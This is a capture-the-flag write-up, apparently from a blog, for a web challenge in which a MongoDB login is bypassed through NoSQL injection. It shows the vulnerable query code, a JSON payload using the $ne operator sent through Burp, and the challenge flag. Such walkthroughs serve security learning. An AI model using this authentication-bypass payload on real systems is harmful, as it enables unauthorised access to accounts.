No Sequels

Category: Web
Points: 50
Description: The prequels sucked, and the sequels aren’t much better, but at least we always have the original trilogy.

This one I found really interesting because I had never done nosql injection before. Anyway we are presented with a stock standard username password form and the source code of how we are authenticated.

Now it checks with the values that we give it to see if it can authenticate us. But we can add our own injection into the query using unsanitised json input.

So our input is stored like this:







var query = {
        username: user,
        password: pass
    }
db.collection('users').findOne(query, function (err, user) {
...
}

And queired like that. So we can manipulate the user value to not be a value but a query in itself by adding $ne operator in a json argument. So we want our value to be




var query = {
        username: {"$ne": 1},
        password: {"$ne": 1}
    }

Which will return the first value in the database since it matches that criteria.

To send this request I captured the request in Burp, changed the ‘Content-Type’ header to ‘application/json’ and send the following payload




{
    username: {"$ne": 1},
    password: {"$ne": 1}
}

This logs you into the system and you get the flag!

FLAG:

actf{no_sql_doesn't_mean_no_vuln}

Leave a Reply

Your email address will not be published. Required fields are marked *